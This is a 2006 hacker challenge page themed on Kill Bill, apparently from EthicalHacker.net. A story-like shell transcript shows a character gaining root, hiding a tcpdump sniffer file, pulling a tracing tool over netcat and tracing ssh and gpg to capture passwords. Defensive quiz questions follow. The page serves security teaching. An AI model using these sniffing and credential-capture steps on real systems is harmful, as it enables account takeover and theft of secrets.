Hack Bill!

| July 9, 2006

Active Image
Active Image del.icio.us

Discuss in Forums {mos_smf_discuss:July 06 – Hack Bill!}

Hello, challenge fans!  Ed Skoudis from Intelguardians here, ready to introduce a freshly baked hacker challenge to tickle your fancy.  I’m really excited to announce that, this month, I’ve asked one of my best friends, Mike Poor, to write a movie-themed hacker challenge.  This is the first challenge one of my buddies has written, and, wow, has Mike done a fantastic job!  Mike, as you may know, is the ultimate packet stud and UNIX diva, and has brewed up an amazing tale for you.

Please read Mike’s challenge, compose your answers, and e-mail them to skillz0706@ethicalhacker.net with the 'Subject: Skillz Submission' by July 31, 2006.  Mike will choose three winners, who will receive an autographed copy of my book, Counter Hack Reloaded.  We’ll award a prize to the best technical answer, another to the most creative technically correct answer, and a third will be drawn from all answers submitted, whether correct or not.  So, even if you cannot answer all of the questions, or aren’t sure about your ideas, go ahead and send in what you have.  You just might win the prize in the random draw category.

And now, without further adieu, I’m absolutely delighted to introduce Mike’s fantastic handiwork below, based on the Quentin Tarantino film, Kill Bill!

–Ed Skoudis
Author, Counter Hack Reloaded


This is not an easy challenge, but then again, you will be competing with the best security minds from around the world. Are you ready to have your name in lights!

Feel free to discuss the scenario in the forums but PLEASE do not post your answers.
You wouldn't want someone else winning your prize, would you?

coreimpact2c.gif
Skillz Sponsored by Core Security Technologies

Hack Bill!

Or, how O-ren Ishii became boss of bosses of the Tokyo underground crime syndicate

By Mike Poor

We all know what happened the night O-ren became boss of bosses, murdering Boss Tanaka for his insolence.  What most of us don’t know is how, in just one year, this Chinese-American became the most powerful figure in the Japanese underworld.

O-ren Ishii, a.k.a. Cottonmouth, was a member of the infamous Deadly Viper H4x0r Squad.  From youth, O-ren was rife with ambition.  She had worked her way through the ranks as both a physical and cyber killer.

Bill, the Snake Charmer, was the leader of the Squad.  He had secured most of his fortune by providing protection and assassinations to the Japanese crime bosses.  As the crime syndicates, also known as Yakuza, turned from old world fraud and intimidation to online cyber extortion and spam, Bill did the same.  He kept a secret file on all of his dealings with the Japanese, including information that he could use to blackmail the bosses if a deal went sour.

Boss Tanaka ran Japanese Anatomical Enhancement Products Incorporated (J.A.E.P.I.).  It was through his unscrupulous use of spam bots that he marketed his way to fortune.  Boss Tanaka occasionally used Bill to do his dirty work for him.  Bill would wield his expertise in mass exploitation to amass cyber armies for Tanaka’s spam herds.

O-ren had longed for the opportunity to be rid of Tanaka and control the Japanese underworld.  Tonight was the night that she would make her move.  Just as Bill was to begin nightly operations, O-ren set her trap.  She logged into snakepit, the Squad’s shell server, and began typing commands:

cottonmouth@snakepit:~ $ cat /etc/sudoers
root    ALL=(ALL) ALL
snakecharmer    ALL=(ALL) ALL
cottonmouth     ALL=(ALL) ALL
californiamountainsnake ALL=(ALL) ALL
copperhead      ALL=(ALL) ALL
blackmamba      ALL=(ALL) ALL
sidewinder      ALL=(ALL) ALL
cottonmouth@snakepit:~ $ sudo su -
root@snakepit: # cd /home/cottonmouth/
root@snakepit:/home/cottonmouth # mkdir " "
root@snakepit:/home/cottonmouth # cd
root@snakepit:/home/cottonmouth/  # tcpdump -nnw " " &
[1] 4371
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
root@snakepit:/home/cottonmouth # ls -i “ “
  97314
root@snakepit:/home/cottonmouth # unlink “ “
root@snakepit:~/  # nc -lp 5050 > apptrace
root@snakepit:~/  # chmod +x apptrace
root@snakepit:~/  # ./apptrace /usr/sbin/ssh

With her trap set, O-ren waited for apptrace to generate some output.  Later, from the apptrace output file, O-ren extracted the ssh password and the target host that Bill had logged into:

Active Image

Here we see that snakecharmer's password to 192.168.159.133 is: "6f74616b75".  O-ren used this username and password combination from 192.168.159.133 to gain access to Bill's account on his personal machine.

root@snakepit:~ # ssh snakecharmer@192.168.159.133
password:
[snakecharmer@localhost snakecharmer]$ id
uid=500(snakecharmer) gid=500(snakecharmer) groups=500(snakecharmer)
[snakecharmer@localhost snakecharmer]$ sudo su -
[root@localhost root]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@localhost snakecharmer]# ls
okunote
[root@localhost snakecharmer]# file okunote
okunote: PGP armored data message

At this point, O-ren uploaded and ran apptrace again to monitor gpg in an attempt to discover Bill’s gpg passphrase.  Shortly thereafter she found what she was looking for in the trace output:

1934  write(6, "Enter passphrase: ", 18) = 18
1934  read(6, "4", 1)                   = 1
1934  read(6, "2", 1)                   = 1
1934  read(6, "6", 1)                   = 1
1934  read(6, "9", 1)                   = 1
1934  read(6, "6", 1)                   = 1
1934  read(6, "c", 1)                   = 1
1934  read(6, "6", 1)                   = 1
1934  read(6, "c", 1)                   = 1
1934  read(6, "n", 1)                  = 1

Once again we see the passphrase in clear text: “42696c6c”.  O-ren moved quickly to decrypt the file:

[snakecharmer@localhost snakecharmer]$ gpg –decrypt okunote
gpg: Warning: using insecure memory!
You need a passphrase to unlock the secret key for
user: "Bill Snakecharmer <bill@dvhs.tgt>"
1024-bit ELG-E key, ID 11D6CF5F, created 2006-07-06 (main key ID E921E06D)
gpg: encrypted with 1024-bit ELG-E key, ID 11D6CF5F, created 2006-07-06
      "Bill Snakecharmer <bill@dvhs.tgt>"
The supreme art of war is to subdue the enemy without fighting
- Sun Tzu in The Art of War
The secret password to control the bot net is: g0dz1ll4

O-ren used the contents of the secret file to take over Bill’s bot armies to force Bill into turning all of his Japanese business over to her control…   And, that was how O-ren became boss of bosses of the Tokyo underground crime syndicate.

But, you would never want to fall victim to such a nefarious scheme.  Avoid falling into a trap like the one O-ren set for Bill by answering these challenge questions:

1.    How can you restrict sudo to specific commands for specific users?
2.    What does O-ren do immediately after starting her sniffer?  Why?  How can a sysadmin find that file on the box?  How can O-ren recover her sniffer file?
3.     How did O-ren get Bill’s passwords for ssh and gpg?  What can Bill do to safeguard his gpg-protected information from such attacks?
4.     For extra credit: what is the meaning behind snakecharmer’s passwords?

Remember, please submit your answers to skillz0706@ethicalhacker.net with the 'Subject: Skillz Submission' by July 31, 2006.  In early August, we’ll announce three winners, one from each of these categories:

·        Best technical answer
·        Most creative and technically correct answer
·        Random draw from all answers submitted, correct, incorrect, complete, partially complete, etc.

Each winner gets a copy of Counter Hack Reloaded, autographed by Ed Skoudis and Mike Poor, congratulating you on your victory and amazing abilities!

For fun, try this Kill Bill! Edition of SLAX (Small Bootable Linux Distro)

SLAX KillBill Edition v 5.1.6

SLAX KB is a pocket operating system with the ability to run many Windows applications natively in Linux. It contains KDE, wine, dosbox and qemu.

http://www.slax.org/download.php

 

Category: Skillz

Comments are closed.